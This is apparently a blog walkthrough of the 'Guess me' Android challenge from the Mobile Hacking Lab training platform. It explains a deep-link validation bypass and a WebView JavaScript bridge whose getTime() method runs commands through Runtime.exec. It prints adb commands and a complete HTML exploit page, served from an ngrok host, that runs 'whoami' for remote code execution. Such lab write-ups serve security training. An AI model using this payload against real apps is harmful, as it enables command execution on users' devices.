Guess me

Hello everyone , In this blog post , I will try to explain my solution steps for Guess me challenge from Mobile Hacking Lab Platform . i hope it will be useful for you

1. Hello everyone , In this blog post , I will try to explain my solution steps for IOT Connect challenge from Mobile Hacking Lab Platform . i hope it will be useful for you

2. Let's install our app then open the application . we found that : it’s a game that have a random number and when you put the right guess you won

   

   image.png
3. During Analysis the AndroidManifest.xml file we found 2 important Activity : the MainActivity and WebView activity use ( mhl schema )

   
4. Let’s Analysis the First one (MainActivity) : i found an important method :

   1. startNewGame() : First generate a random number (Secret number ) , then Reset the attempt to 0 , display an initial message , then use enable user interact to input text

      
   2. ValidateGuess() : retrieve the user input then identify if it high or low comparing with the real value , then check if it valid or not , if it success then display congrats message , if it not display fail message

      
   3. enable/disable input () : it make user able to input or not

5. Let’s Analysis the Sec one (WebviewActivity) : i found an important method :

   1. oncreate() : enable JS in our app , add JS Interface that make the js code interact with the app ,, android Bridge is the name that the WebView will use it to interact with the app

      
   2. isValidDeepLink() : validates URLs based on : URLs with the schemes mhl or https and the host mobilehackinglab. It also checks that the url query parameter ends with "mobilehackinglab.com".

      
   3. MyJavaScriptInterface class

      1. loadWebsite() : take the URL and check for it not null then Load it inside the WebView

      2. getTime() : take the string and then execute it in the system because it use Runtime.getRuntime().exec(Time); ,, then use Stream to read the result of execution and then convert the data to txt file

         
6. Let’s test it using adb : adb shell am start -n com.mobilehackinglab.guessme/.WebviewActivity -d "mhl://mobilehackinglab?url=https://google.com/mobilehackinglab.com"

   
7. then we can call the method inside MyJavaScriptInterface class and write a malicious JS to call getTime () code contain malicious argument and load it via the deep link from a public server to achieve RCE

   <!DOCTYPE html>
   <html lang="en">
   <head>
       <meta charset="UTF-8">
       <meta name="viewport" content="width=device-width, initial-scale=1.0">
   </head>
   <body>
   
   <p id="result">Thank you for visiting</p>
   
   <!-- Add a hyperlink with onclick event -->
   <a href="#" onclick="executeCommand()">Execute Command</a>
   
   <script>
   
       function executeCommand() {
           try {
               var result = AndroidBridge.getTime("whoami");
               var lines = result.split('\\n');
               var timeVisited = lines[0];
               var fullMessage = "Command: " + timeVisited;
               document.getElementById('result').innerText = fullMessage;
   
               window.location.href = "https://www.mobilehackinglab.com/";
           } catch (e) {
               console.error("Error calling getTime:", e);
           }
       }
   
   </script>
   
   </body>
   </html>

8. 
9. let’s use this exploit with adb : adb shell am start -W -a android.intent.action.VIEW -d "mhl://mobilehackinglab/?url= [https://104a-156-203-231-227.ngrok-free.app/exploit.html?mobilehackinglab.com](https://104a-156-203-231-227.ngrok-free.app/exploit.html?mobilehackinglab.com)"

   
10. and here we already execute whoami command and then we get RCE